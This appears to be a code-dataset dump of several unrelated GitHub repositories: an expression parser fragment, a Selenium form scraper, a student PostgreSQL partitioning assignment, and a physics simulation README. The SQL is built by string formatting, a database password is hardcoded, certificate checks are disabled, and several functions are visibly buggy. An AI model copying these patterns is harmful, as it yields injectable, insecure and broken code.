None\n\n def advance(self, offset=1):\n \"\"\"\n consumes string based on the rule applied\n \"\"\"\n self.expr = self.expr[offset:]\n\n def e(self):\n \"\"\"\n E → P + E | P\n \"\"\"\n prod = self.p()\n\n # need to check to verify if it is P + E\n if self.expr and self.expr[0] == \"+\":\n self.match(\"+\")\n ex = self.e()\n # we return tuples to represent a node and its left and right nodes\n # since then we can apply tuple unpacking to neatly process the tree\n return (prod, \"+\", ex)\n\n return prod\n\n def p(self):\n \"\"\"\n P → T * P | T\n \"\"\"\n term = self.t()\n\n if self.expr and self.expr[0] == \"*\":\n self.match(\"*\")\n prod = self.p()\n return (term, \"*\", prod)\n\n return term\n\n def t(self):\n \"\"\"\n T → Num | (E)\n \"\"\"\n if self.expr[0] == \"(\":\n self.match(\"(\")\n ex = self.e()\n self.match(\")\")\n\n return ex\n\n # numbers are the leafs of our tree\n # so we just keep them as ints and not tuples\n return self.read_number()\n\n def match(self, symbol):\n \"\"\"\n match provided symbol to the next element in expression\n \"\"\"\n next = self.expr[0]\n self.advance()\n\n if next != symbol:\n raise ValueError\n\n def read_number(self):\n \"\"\"\n read a number from the expression\n \"\"\"\n if not self.expr:\n return\n\n match = NUM.match(self.expr)\n\n if not match:\n raise ValueError\n\n # get the actual number from the match object\n number = match.group(\"NUM\")\n\n self.advance(len(number))\n\n return int(number)\n\n\nif __name__ == \"__main__\":\n Parse.generate(Parse(input(\"enter your expression or q to exit: \")).parser())\n"
}
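For quick reference, the class-based rewrite above is driven like this (assuming `Parse.py` is importable from the working directory, as it is in `test_parser.py`):

```python
# Example use of the Parse class above.
from Parse import Parse

tree = Parse("(12 * (2 + 4) * 3)").parser()
print(tree)            # (12, '*', ((2, '+', 4), '*', 3))
Parse.generate(tree)   # prints the .load/.mult/.add stack program
```

Returning the tree (or `None` for invalid input) instead of printing is what makes the class testable with the parametrized expected-tree table in `test_parser.py`.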
] | 4 |
ErikFerragut/scraper
|
https://github.com/ErikFerragut/scraper
|
f5a952150f5a018d400cfe75c272cd28c2c91655
|
30dd80d22787b58095253ed378e021fcc54ed835
|
732f5a5d83293ae8ff218135c97405dbf9932310
|
refs/heads/master
| 2023-01-06T00:06:49.374881 | 2021-12-14T22:24:29 | 2021-12-14T22:24:29 | 247,456,659 | 0 | 0 | null | 2020-03-15T11:53:00 | 2021-12-14T22:24:32 | 2022-12-27T16:20:15 |
Python
|
[
{
"alpha_fraction": 0.5945994853973389,
"alphanum_fraction": 0.5985864400863647,
"avg_line_length": 38.69784164428711,
"blob_id": "ff94a549233cacd5ee9806d3e6a4b1e91f402b71",
"content_id": "daadcba5b338bd65eaaf62caad88636147f8e717",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5518,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 139,
"path": "/formscraper.py",
"repo_name": "ErikFerragut/scraper",
"src_encoding": "UTF-8",
"text": "import yaml, time\n\nfrom selenium.common.exceptions import TimeoutException\nfrom bs4 import BeautifulSoup as bs\nimport pandas as pd\nimport sqlalchemy\nimport click\n\nfrom scrapelib import *\n\n\[email protected]()\ndef cg():\n pass\n\n\[email protected](help='Scan a site to grab form metadata')\[email protected]('--debug', is_flag=True, help='use a visible browser')\[email protected]('--url', required=True, help='site (include http(s)://) with form(s)')\[email protected]('--output', help='output file to store forms meta-data')\[email protected]('--form-tag', default='form', help='by defaults looks for \"form\" tags')\ndef scan(debug, url, output, form_tag):\n # If exploring -- load the page, process the forms, output what we learned\n print('comment: Creating browser')\n browser = create_new_browser(not debug) # create a browser instance and get page\n print('comment: Accessing site \"{}\"'.format(url))\n browser.get(url)\n soup = bs(browser.page_source, 'lxml') # parse the page\n forms = get_forms(soup, form_tag) # extract forms and take the one we want\n print('comment: Writing results to', output)\n if output == 'stdout' or output is None:\n print(yaml.dump(forms))\n else:\n with open(output, 'w') as fout:\n fout.write(yaml.dump(forms))\n browser.close()\n # Use the output to figure out what range of inputs you want to scrape over\n # and put that ino the config yaml file for your scraping project\n\n\[email protected](help='Collect results from a range of form inputs')\[email protected]('--debug', is_flag=True, help='use a visible browser')\[email protected]('--kth', default=1, help='process kth input of every n')\[email protected]('--n', default=1, help='of every n inputs will process the kth')\[email protected]('--max-to-work', default=0, help='max number of inputs to process; 0 for all')\[email protected]('config')\ndef scrape(debug, kth, n, config, max_to_work):\n # 1. read globals and open DB, set derivative values\n G = yaml.load(open(config), yaml.Loader)\n G['form'] = yaml.load(open(G['form_yaml']), yaml.Loader)[G['input_form_id']]\n con = sqlalchemy.create_engine(G['output_db']).connect()\n\n if 'form_wait' in G:\n form_wait_elt = (By.CLASS_NAME if G['form_wait'].get('by') == 'class' else By.ID,\n G['form_wait']['value'], G['form_wait']['delay'])\n form_throttle = G['form_wait'].get('throttle', 0)\n else:\n form_wait_elt = (By.TAG_NAME, 'body', 10)\n form_throttle = 0\n \n if 'table_wait' in G:\n table_wait_elt = (By.CLASS_NAME if G['table_wait'].get('by') == 'class' else By.ID,\n G['table_wait']['value'], G['table_wait']['delay'])\n table_throttle = G['table_wait'].get('throttle', 0)\n no_table_str = G['table_wait'].get('absent_str')\n else:\n table_wait_elt = (By.TAG_NAME, 'body', 10)\n table_throttle = 0\n no_table_str = None\n \n # 2. make sure the inputs and results tables are up to date\n inputs = update_inputs_table(con, G)\n results = updated_results_table(con)\n results = results[ results.index % n == (kth - 1) ]\n\n # 3. 
grab a not started input from results and see its inputs\n browser = create_new_browser(not debug) # create a browser instance\n last_url = ''\n for i, ind in enumerate(results.index):\n print('Working on input', ind, 'which is', i+1, 'of', len(results.index))\n fill_with = dict(inputs.loc[ind])\n next_url = fill_with.pop('url')\n submit_with = { fill_with.pop('subkey'): fill_with.pop('subval') }\n set_status(con, ind, 'started')\n\n\n print('Going to form page, verifying form has not changed')\n if G.get('form-on-table-page') and last_url != '':\n print('-- form is also on the table page')\n elif last_url == next_url:\n browser.back()\n else:\n browser.get(next_url)\n last_url = next_url\n assert wait_for(browser, *form_wait_elt), 'Form not loading'\n time.sleep(form_throttle)\n page_form = get_forms(bs(browser.page_source, 'lxml'))[G['input_form_id']]\n if page_form != G['form']:\n print('WARNING: page form has changed')\n\n print('Filling and submitting form')\n fill_and_submit(browser, G['form'], fill_with, submit_with)\n if not wait_for(browser, *table_wait_elt):\n if no_table_str in browser.page_source:\n print('No results for this one')\n set_status(con, ind, 'done')\n continue\n else:\n set_status(con, ind, 'error')\n browser.save_screenshot('debug.png')\n os.system('open debug.png')\n raise TimeoutException\n time.sleep(table_throttle)\n\n print('Parsing the table(s)')\n tables = get_tables(browser, G['output_table'])\n\n print('Posting to output table(s)')\n fill_with['url'] = G['url']\n fill_with['subkey'] = list(submit_with.keys())[0]\n fill_with['subval'] = list(submit_with.values())[0]\n fill_with['input_form_id'] = G['input_form_id']\n fill_with['input_index'] = ind\n for name, table in tables.items():\n post_table(con, name, table, **fill_with)\n\n print('Updating results status')\n set_status(con, ind, 'done')\n\n if i+1 == max_to_work:\n break\n\n # 4. close up\n print('Done')\n con.close()\n browser.close()\n\nif __name__ == '__main__':\n cg()\n"
},
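The `--kth`/`--n` options in formscraper.py shard the pending inputs by index modulo, so several scraper processes can split one inputs table without coordination. A minimal sketch of that filter, assuming only pandas (the DataFrame here is invented for illustration):

```python
import pandas as pd

# Hypothetical stand-in for the 'results' table read from the database.
results = pd.DataFrame({'status': ['not started'] * 10})

def shard(df, kth, n):
    # Keep rows whose index falls in the kth of n residue classes,
    # matching results.index % n == (kth - 1) in scrape() above.
    return df[df.index % n == (kth - 1)]

# Worker 1 of 3 gets rows 0, 3, 6, 9; worker 2 gets 1, 4, 7; worker 3 gets 2, 5, 8.
print(shard(results, 1, 3).index.tolist())  # [0, 3, 6, 9]
```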
{
"alpha_fraction": 0.551260232925415,
"alphanum_fraction": 0.5536105036735535,
"avg_line_length": 34.66184997558594,
"blob_id": "9fc792efc1d5590a611b63d1612c4fea5af84067",
"content_id": "858e470e2211c4257fec5cd8a7954d31791ac4f5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12339,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 346,
"path": "/scrapelib.py",
"repo_name": "ErikFerragut/scraper",
"src_encoding": "UTF-8",
"text": "# make sure you:\n# brew cask install chromedriver # for chrome\n# brew install geckodriver # for firefox\n# pip install selenium\n\nimport os, itertools, datetime\n\nimport pandas as pd\nimport sqlalchemy\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.keys import Keys\n\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait, Select\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\n\n# ASSUMPTIONS:\n# 1. Assumes radio button id is linked to with label having for=\"that_id\"\n\n################################################################################\n# Generic functions -- belongs elsewhere\n################################################################################\ndef dict_tree(adict, indent=0):\n indentation = ' ' * (3*indent)\n for key,value in adict.items():\n if isinstance(value, dict):\n print(indentation, key + ':')\n dict_tree(value, indent+1)\n else:\n print(indentation, key + ':', value)\n\n\nclass one_up():\n '''A way of generating new 1-up integers as needed'''\n def __init__(self, first_num=1):\n self.count = first_num - 1\n def __call__(self):\n self.count += 1\n return self.count\n\n\ndef hash_it(something):\n '''Given something, turn it into a string, replace whitespace with | and hash it.\n Returns the hexdigest of the md5 hash.'''\n if isinstance(something, dict):\n the_string = sorted(something.items()) # can break on nested dicts\n the_string = str(something)\n return hashlib.md5('|'.join(the_string.split()).encode()).hexdigest()\n\n\n################################################################################\n# Construct the product iterator for inputs\n################################################################################\ndef to_iterator(key, type, value, options=[]):\n if type == 'const':\n assert isinstance(value, str), 'Type const must have str value'\n return [(key, value)]\n elif type == 'list':\n assert isinstance(value, list), 'Type list must have list value'\n return [(key, v) for v in value]\n elif type == 'all':\n return [(key,option) for option in options]\n elif type == 'all-but':\n assert isinstance(value, list), 'Type all-but must have list value'\n return [(key,option) for option in options if option not in value ]\n elif type == 'slice':\n from_,to_,by_ = map(int, value.split())\n return ((key,x) for x in range(from_,to_,by_))\n else:\n raise KeyError('Unknown variable range type: ' + type)\n \n\ndef form_inputs_to_input_generator(form, form_inputs):\n iterators = {\n k:to_iterator(k, v['type'], v['value'], form['inputs'][k].get('texts', []))\n for k,v in form_inputs.items()\n }\n\n return map(dict, itertools.product(*iterators.values()))\n\n\n################################################################################\n# Scraping functionality\n################################################################################\ndef create_new_browser(headless=True):\n options = webdriver.FirefoxOptions()\n options.headless = headless\n options.add_argument('--ignore-certificate-errors')\n options.add_argument('--test-type')\n browser = webdriver.Firefox(\n options=options,\n executable_path='/usr/local/bin/geckodriver'\n )\n return browser\n\n\ndef get_forms(soup, form_container='form'):\n forms = {}\n for form in soup.find_all(form_container):\n newnum = one_up()\n \n id = form.get('id') or newnum()\n 
form_metadata = { 'id': id }\n\n # process forms -- organize by id b/c name repeats over radio buttons\n inputs = {\n inp.get('id') or newnum():\n {\n 'type':'text',\n 'name':inp.get('name')\n }\n for inp in form.find_all('input', {'type':'text'})\n }\n\n # inputs[name]['options'] = {id1:text1, id2:text2, id3:text3}\n for inp in form.find_all('input', {'type':'radio'}):\n name = inp.get('name') or newnum()\n if name not in inputs:\n inputs[name] = {\n 'type':'radio', 'radio_ids':[], 'label_ids':[], 'label_texts':[]}\n rad_id = inp.get('id')\n label_ids = soup.find_all(attrs={'for':rad_id})\n assert len(label_ids) == 1, 'Broken radio button ' + rad_id\n inputs[name]['radio_ids'].append(rad_id) # currently uses this\n inputs[name]['label_ids'].append(label_ids[0].get('id'))\n inputs[name]['label_texts'].append(label_ids[0].text)\n \n inputs.update( {\n inp.get('id') or newnum():\n {\n 'type':'select',\n 'name':inp.get('name'),\n 'values': [ s.get('value') for s in inp.find_all('option') ],\n 'texts': [ s.text for s in inp.find_all('option') ]\n }\n for inp in form.find_all('select')\n } )\n\n inputs.update( {\n inp.get('id') or newnum():\n {\n 'type':'hidden',\n 'name':inp.get('name')\n }\n for inp in form.find_all('hidden')\n } )\n\n form_metadata['inputs'] = inputs\n\n form_metadata['buttons'] = {\n button.get('id') : button.text\n for button in form.find_all('button')\n }\n\n forms[ id ] = form_metadata\n\n if newnum.count:\n print('WARNING: Form {} had {} id-less elements'.format(id, newnum.count))\n \n return forms\n\n\ndef fill_and_submit(browser, form, fill_with, submit_with):\n '''Takes a browser and a form (from get_forms) to be filled with\n fill_with, a dict from id to value for text and selection, but\n from name to id for radio button. When filled, clicks the button\n whose id is given by submit_with.\n '''\n # uses value_selection AND form\n for k,v in fill_with.items():\n item_type_data = form['inputs'].get(k)\n assert item_type_data is not None, 'Unexpected key: '+k\n\n if item_type_data['type'] == 'text':\n text_element = browser.find_element_by_id(k)\n text_element.clear()\n text_element.send_keys(str(v))\n\n elif item_type_data['type'] == 'select':\n select_element = Select(browser.find_element_by_id(k))\n select_element.select_by_visible_text(v)\n\n elif item_type_data['type'] == 'radio':\n # at least this works for oddshark\n label_elements = browser.find_elements_by_xpath(\"//label[@for='{}']\".format(v))\n assert len(label_elements) == 1, \\\n 'Value {} had {} element matches'.format(v,len(label_lements))\n label_elements[0].click()\n\n if 'id' in submit_with.keys():\n submit_button = browser.find_element_by_id(submit_with['id'])\n elif 'name' in submit_with.keys():\n submit_button = browser.find_element_by_name(submit_with['name'])\n \n submit_button.click()\n # if this doesn't work, do: submit_button.send_keys(Keys.ENTER)\n\n\ndef wait_for(browser, what_type, what_value, delay):\n '''wait_for(By.CLASS_NAME, 'table-wrapper') waits up to delay seconds\n for the class \"table-wrapper\" to load, returning True if it did,\n False o/w. 
Can also use By.ID.\n ''' \n elt_wait_for = (what_type, what_value)\n delay = 3 # seconds\n try:\n myElem = WebDriverWait(browser, delay).until(\n EC.presence_of_element_located(elt_wait_for))\n return True\n except TimeoutException:\n return False\n \n\ndef get_tables(browser, output_table):\n '''Get tables in the browser's page source selected according to\n output_table, which is a dictionary with a select key.\n\n If select is 'by position' then a which key gives the integer\n (1-up) of which table to return.\n\n If select is 'by positions' then a which key gives the list of all\n tables to return (1-up).\n '''\n tables = pd.read_html(browser.page_source)\n \n table_select = output_table['select']\n if table_select == 'by position':\n tables = [tables[output_table['which']-1]]\n elif table_select == 'by positions':\n tables = [ tables[i-1] for i in tables[output_table['which']] ]\n elif table_select == 'flatten':\n tables = [\n pd.DataFrame([ t.columns[0] + tuple(t.values.flatten()) for t in tables ])\n ]\n else:\n raise KeyError('Unknown select \"{}\" for output_table'.format(table_select))\n\n table_names = output_table.get('table_names') or [ output_table['table_name'] ]\n\n return dict(zip(table_names, tables))\n \n################################################################################\n# Storage into Database\n################################################################################\ndef set_status(con, ind, status, status_table='results'):\n con.engine.execute('''\n update {}\n set status = '{}',\n last_update = datetime('now')\n where id = '{}' \n '''.format(status_table, status, ind))\n\n\ndef update_inputs_table(con, G):\n '''Update input table with the rows from form_inputs (BUGGY!)'''\n inputs = pd.DataFrame(list(\n form_inputs_to_input_generator(G['form'], G['form_inputs'])))\n inputs['url'] = G['url']\n inputs['subkey'] = list(G['submit_with'].keys())[0]\n inputs['subval'] = list(G['submit_with'].values())[0]\n\n if 'inputs' in con.engine.table_names(): # read the existing inputs\n old_inputs = pd.read_sql('select * from inputs', con, index_col='id')\n both_inputs = pd.concat([old_inputs, inputs])\n repeats = both_inputs.duplicated(keep='first')\n is_new_input = ~repeats.values[ len(old_inputs): ]\n num_new = is_new_input.sum()\n print('Found {} of {} new inputs are not in {} old inputs'.format(\n num_new, len(inputs), len(old_inputs)))\n\n if num_new:\n last_index = old_inputs.index.max()\n inputs.index = pd.RangeIndex(last_index, last_index + len(inputs))\n \n print('Updating inputs table')\n inputs.to_sql(\n name='inputs',\n con=con,\n if_exists='append',\n index=True,\n index_label='id'\n )\n else:\n print('No input table present. 
Creating {} rows'.format(len(inputs)))\n inputs.to_sql(\n name='inputs',\n con=con,\n if_exists='append',\n index=True,\n index_label='id'\n )\n\n return pd.read_sql(\"select * from inputs\", con, index_col='id')\n\n\ndef updated_results_table(con):\n no_status_table = pd.read_sql('inputs', con)[ ['id'] ].assign(\n status = 'not started',\n last_update = datetime.datetime.now()\n ).set_index('id')\n\n if 'results' in con.engine.table_names():\n actual_status = pd.read_sql('results', con, index_col='id')\n new_indices = set(no_status_table.index).difference(actual_status.index)\n append_this = no_status_table.loc[new_indices]\n print('Updating results table with {} rows'.format(len(append_this)))\n else:\n print('Creating results table')\n append_this = no_status_table\n\n append_this.to_sql(\n name='results',\n con=con,\n if_exists='append',\n index=True,\n index_label='id'\n )\n\n return pd.read_sql(\"select * from results where status <> 'done' and status <> 'error'\",\n con, index_col='id')\n\n\ndef post_table(con, table_name, table, **scrape_args):\n '''Post a table to the named output table.\n\n Takes table, augments with constant columns from scrape_args, and\n posts to the table called table_name accessible via connection\n con. Also augments with a timestamp, which it returns.\n '''\n timestamp = datetime.datetime.now()\n scrape = scrape_args.copy()\n scrape['posted'] = timestamp\n scrapes = []\n\n for k,v in scrape.items():\n table[k] = v\n\n table.to_sql(\n name = table_name,\n con = con,\n if_exists = 'append',\n index = False,\n )\n"
}
] | 2 |
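scrapelib's `form_inputs_to_input_generator` enumerates every combination of form inputs by taking the cartesian product of per-field `(key, value)` iterators and zipping each combination back into a dict. A self-contained sketch of the same idea (field names and values are invented for illustration):

```python
import itertools

# Each field expands to a list of (key, value) pairs, as to_iterator does.
iterators = {
    'year':  [('year', y) for y in ['2020', '2021']],
    'state': [('state', s) for s in ['TX', 'CA']],
}

# itertools.product picks one (key, value) pair per field; dict() turns
# each combination into a single form-fill dictionary.
for fill_with in map(dict, itertools.product(*iterators.values())):
    print(fill_with)
# {'year': '2020', 'state': 'TX'}, {'year': '2020', 'state': 'CA'}, ...
```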
chandangs16/Assignment1-D_D_S
|
https://github.com/chandangs16/Assignment1-D_D_S
|
aceb08cde517270d44daa996358bcda33f75bad4
|
5fb732745502388a9635d19de81531f40a316f41
|
4682c6682b964e5a9459c2626ebb9e9f2cbf372d
|
refs/heads/master
| 2021-05-04T11:55:10.121397 | 2017-01-30T07:41:23 | 2017-01-30T07:41:23 | 80,314,054 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6138669848442078,
"alphanum_fraction": 0.6219842433929443,
"avg_line_length": 32.22097396850586,
"blob_id": "50a1aa760d0d19a83a77043768596049619f12a6",
"content_id": "d8f380389f1fe9c69c19035d40d9623746e35d83",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8870,
"license_type": "no_license",
"max_line_length": 170,
"num_lines": 267,
"path": "/Interface.py",
"repo_name": "chandangs16/Assignment1-D_D_S",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python2.7\n#\n# Interface for the assignement\n#\nimport sys\nimport psycopg2\n\nDATABASE_NAME = 'dds_assgn1'\nRATINGS_TABLE = 'Ratings'\nMAX_RATING = 5.0\nMIN_RATING = 0.0\nRANGE_TABLE_NAME=\"range_part\"\nROUND_ROBIN_TABLE=\"rrobin_part\"\nINPUT_FILE_PATH='E:/Python Projects/Proj1/ratings.dat'\nRANGE_PARTITIONS= 0\nRROBIN_PARTITIONS=0\n\nMETADATA_TABLE=\"metadata_table\"\n\n\ndef getopenconnection(user='postgres', password='cgsasu123', dbname='dds_assgn1'):\n return psycopg2.connect(\"dbname='\" + dbname + \"' user='\" + user + \"' host='localhost' password='\" + password + \"'\")\n\n\n\n\ndef loadratings( ratingstablename, ratingsfilepath, openconnection):\n\n with open(ratingsfilepath,'r') as doc:\n docs = doc.read()\n docs = docs.replace('::',':')\n with open(ratingsfilepath,'w') as doc:\n doc.write(docs)\n\n curs=openconnection.cursor()\n curs.execute(\"DROP TABLE if EXISTS \" + ratingstablename)\n curs.execute(\"CREATE TABLE \"+ratingstablename + \"(UserID INT, MovieID INT,Rating REAL, temp varchar(10)); \")\n\n\n movie_data=open(ratingsfilepath,'r')\n print(\"before copy\")\n curs.copy_from(movie_data, ratingstablename, sep=':', columns=('UserID', 'MovieID', 'Rating', 'temp'))\n curs.execute(\"ALTER TABLE \" + ratingstablename + \" DROP COLUMN temp\")\n\n\n\n\n curs.execute(\"DROP TABLE if EXISTS \" + METADATA_TABLE)\n\n curs.execute(\"CREATE TABLE \" + METADATA_TABLE + \"(table_type INT,num_partitions INT, partition_range REAL,next_table INT); \")\n curs.execute(\"INSERT INTO \" + METADATA_TABLE + \" VALUES (%d,%d,%f,%d)\" % (1,0,0,0)) # 1 is range_part. 2 is rrobin_part\n curs.execute(\"INSERT INTO \" + METADATA_TABLE + \" VALUES (%s,%d,%f,%d)\" % (2, 0, 0, 0))\n print(\"meta\")\n\n\n curs.close()\n\n\n\ndef rangepartition(ratingstablename, numberofpartitions, openconnection):\n try:\n curs = openconnection.cursor()\n RANGE_PARTITIONS=numberofpartitions\n partition_range = MAX_RATING/numberofpartitions\n for i in range(0, numberofpartitions):\n minVal = i * partition_range\n maxVal = minVal + partition_range\n tableName = RANGE_TABLE_NAME + str(i)\n curs.execute(\"DROP TABLE IF EXISTS \" + tableName)\n # print(RANGE_TABLE_NAME+\"_\"+\"%s\" %i)\n curs.execute(\"CREATE TABLE \"+tableName+\"(UserID INT, MovieID INT,Rating REAL)\")\n print(\"after create\")\n if i==0:\n curs.execute(\"INSERT INTO \"+tableName + \" SELECT * from \"+ratingstablename + \" where Rating >= \"+str(minVal)+\" AND Rating <= \"+str(maxVal))\n #print(\"sdcas\")\n else:\n curs.execute(\"INSERT INTO \" + tableName + \" SELECT * from \" + ratingstablename + \" where Rating > \"+str(minVal)+\" AND Rating <= \"+str(maxVal))\n curs.execute(\"Update \"+METADATA_TABLE+\" SET num_partitions = \"+str(numberofpartitions)+\", partition_range =\"+str(partition_range)+\" WHERE table_type=%d;\"%(1))\n\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n finally:\n if curs is not None:\n curs.close()\n\ndef roundrobinpartition(ratingstablename, numberofpartitions, openconnection):\n\n curs=openconnection.cursor()\n RROBIN_PARTITIONS=numberofpartitions\n for i in range(0,numberofpartitions):\n tableName = ROUND_ROBIN_TABLE + `i`\n curs.execute(\"DROP TABLE IF EXISTS \" + tableName)\n curs.execute(\"CREATE TABLE \"+tableName+\"(UserID INT, MovieID INT,Rating REAL)\")\n curs.execute(\"select * from \"+ratingstablename)\n file = curs.fetchall()\n print(\"after fetch\")\n # print(row)\n\n i=0\n for data in file:\n tableName= ROUND_ROBIN_TABLE + `i`\n # print(tableName)\n curs.execute(\"INSERT 
INTO \"+tableName+\" VALUES (%s, %s, %s)\" % (data[0], data[1], data[2]))\n i=i+1\n # print(i)\n i=i%numberofpartitions\n # print(\"i=\"+str(i))\n curs.execute(\"Update \"+METADATA_TABLE+\" SET num_partitions =\"+str(numberofpartitions)+\", next_table=\"+str(i)+\"WHERE table_type=%d;\"%(2))\n\n\n curs.close()\n\n\n\n\ndef roundrobininsert(ratingstablename, userid, itemid, rating, openconnection):\n curs=openconnection.cursor()\n try:\n print \"inside try\"\n curs.execute(\"Select num_partitions, next_table from \"+METADATA_TABLE+\" where table_type=%d ;\"%(2))\n meta_data=curs.fetchone()\n num_partitions=meta_data[0]\n print(num_partitions)\n print meta_data[0]\n next_table=meta_data[1]\n print next_table\n\n\n\n curs.execute(\"Insert into \"+ROUND_ROBIN_TABLE+str(next_table)+\" values ( %s,%s,%s)\" %(userid,itemid,rating))\n next_table+=1\n next_table=next_table%num_partitions\n curs.execute(\"Update \"+METADATA_TABLE+\" SET next_table =\"+str(next_table)+\" where table_type=%d ;\"%(2))\n\n\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n finally:\n if curs is not None:\n curs.close()\n\ndef rangeinsert(ratingstablename, userid, itemid, rating, openconnection):\n curs = openconnection.cursor()\n try:\n print \"inside try\"\n print rating\n curs.execute(\"Select num_partitions, partition_range from \" + METADATA_TABLE + \" where table_type=%d ;\" % (1))\n meta_data = curs.fetchone()\n num_partitions = meta_data[0]\n\n print(num_partitions)\n #print meta_data[0]\n partition_range = meta_data[1]\n print partition_range\n temp=[]\n for i in range(0,5.0):\n temp.append(i*partition_range)\n for i in range(5):\n if(temp[i]>rating):\n x=i\n x=x-1\n\n curs.execute(\"Insert into \" + ROUND_ROBIN_TABLE + str(x) + \" values ( %s,%s,%s)\" % (userid, itemid, rating))\n\n #next_table = next_table % num_partitions\n #curs.execute(\"Update \" + METADATA_TABLE + \" SET next_table =\" + str(next_table) + \" where table_type=%d ;\" % (2))\n\n\n\n\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n finally:\n if curs is not None:\n curs.close()\n\n\ndef delete_partitions(openconnection):\n curs = openconnection.cursor()\n curs.execute(\"SELECT num_partitions, table_type FROM \"+METADATA_TABLE)\n rows = curs.fetchall()\n for row in rows:\n num_partitions = row[0]\n t_type=row[1]\n if t_type==1:\n table_type=RANGE_TABLE_NAME\n else:\n table_type=ROUND_ROBIN_TABLE\n for i in range(0,num_partitions):\n table_name=table_type+'i'\n curs.execute(\"DROP TABLE if EXISTS \"+table_name)\n curs.execute(\"DROP TABLE IF EXISTS \"+ METADATA_TABLE)\n curs.close()\n\n\n\n\n\ndef create_db(dbname):\n \"\"\"\n We create a DB by connecting to the default user and database of Postgres\n The function first checks if an existing database exists for a given name, else creates it.\n :return:None\n \"\"\"\n # Connect to the default database\n con = getopenconnection(dbname='postgres')\n con.set_isolation_level(psycopg2.extensions.ISOLATION_LEVEL_AUTOCOMMIT)\n cur = con.cursor()\n\n # Check if an existing database with the same name exists\n cur.execute('SELECT COUNT(*) FROM pg_catalog.pg_database WHERE datname=\\'%s\\'' % (dbname,))\n count = cur.fetchone()[0]\n if count == 0:\n cur.execute('CREATE DATABASE %s' % (dbname,)) # Create the database\n else:\n print 'A database named {0} already exists'.format(dbname)\n\n # Clean up\n cur.close()\n con.close()\n\n\n# Middleware\ndef before_db_creation_middleware():\n # Use it if you want to\n pass\n\n\ndef 
after_db_creation_middleware(databasename):\n # Use it if you want to\n pass\n\n\ndef before_test_script_starts_middleware(openconnection, databasename):\n # Use it if you want to\n pass\n\n\ndef after_test_script_ends_middleware(openconnection, databasename):\n # Use it if you want to\n pass\n\n\nif __name__ == '__main__':\n try:\n\n # Use this function to do any set up before creating the DB, if any\n before_db_creation_middleware()\n\n create_db(DATABASE_NAME)\n after_db_creation_middleware(DATABASE_NAME)\n\n with getopenconnection() as con:\n # Use this function to do any set up before I starting calling your functions to test, if you want to\n before_test_script_starts_middleware(con, DATABASE_NAME)\n comm = sys.argv[1]\n print(sys.argv[0])\n\n loadratings(RATINGS_TABLE, 'E:/Python Projects/Proj1/Tester/test_data.dat', con)\n rangepartition(RATINGS_TABLE, 5, con)\n roundrobinpartition(RATINGS_TABLE, 4, con)\n rangeinsert(RATINGS_TABLE, 10, 12, 3, con)\n\n after_test_script_ends_middleware(con, DATABASE_NAME)\n\n except Exception as detail:\n print \"OOPS! This is the error ==> \", detail\n"
}
] | 1 |
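The round-robin functions in Interface.py keep a `next_table` cursor in the metadata table and advance it modulo the partition count on every insert, so consecutive rows land in consecutive partitions. The core bookkeeping, stripped of the psycopg2 plumbing (a sketch, not the assignment interface itself):

```python
def round_robin_targets(num_partitions, next_table, rows):
    """Yield (partition_index, row) pairs, cycling through partitions.

    next_table plays the role of the cursor persisted in metadata_table.
    """
    for row in rows:
        yield next_table, row
        next_table = (next_table + 1) % num_partitions

rows = [(1, 10, 4.0), (2, 11, 3.5), (3, 12, 5.0), (4, 13, 1.0)]
for part, row in round_robin_targets(3, 0, rows):
    print('rrobin_part%d <- %r' % (part, row))
# rrobin_part0, rrobin_part1, rrobin_part2, then back to rrobin_part0
```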
tomnwright/Interference-Simulation
|
https://github.com/tomnwright/Interference-Simulation
|
d1c28bc8b031778546552e23b22b534910ac53a7
|
5129bc2c7be973ee13dc79e6699955c0f350915f
|
d86c172aa70d9474967b4c21ad747d5fa5c38716
|
refs/heads/master
| 2022-10-19T17:01:27.653640 | 2022-10-18T09:39:19 | 2022-10-18T09:39:19 | 192,102,371 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6842496395111084,
"alphanum_fraction": 0.6952451467514038,
"avg_line_length": 191.2857208251953,
"blob_id": "44fcea916df1ab502f3865482ed389f39f09b6fd",
"content_id": "a4a4625436ced4d29bee03261c5a79cc69ad2121",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 6730,
"license_type": "no_license",
"max_line_length": 1508,
"num_lines": 35,
"path": "/README.md",
"repo_name": "tomnwright/Interference-Simulation",
"src_encoding": "UTF-8",
"text": "# Interference-Simulation\nSimulation of the interference pattern between *n* coherent[<sup>1</sup>](https://github.com/tomnwright/Interference-Simulation/issues/2) sources. Each source is assigned a pixel location. Then, for each pixel, the distance from that pixel to each source is calculated and used to calculate the amplitude of the wave from each source. These amplitudes are added to find the superposition of all waves at that point. A separate function interpolates between blue (-1), white (0), and red (+1), and is used to assign each pixel a colour based on its wave superposition. Wave functions return between -1 (trough) and +1 (peak), but the superposition of these waves may exceed this range.\n\nThe amplitude, *I*, of the wave from each source at a given pixel is calculated as a function of the distance of that pixel to the source. For source A:\n\n<a href=\"https://www.codecogs.com/eqnedit.php?latex=I&space;=&space;\\sin{d}\" target=\"_blank\"><img src=\"https://latex.codecogs.com/gif.latex?I&space;=&space;\\sin{d}\" title=\"I = \\sin{d}\" /></a>\n\nThis produces a wave with a wavelength of <a href=\"https://www.codecogs.com/eqnedit.php?latex=2\\pi\" target=\"_blank\"><img src=\"https://latex.codecogs.com/svg.latex?2\\pi\" title=\"2\\pi\" /></a>. Therefore scaling the function along the *d* axis by a factor of\n\n<a 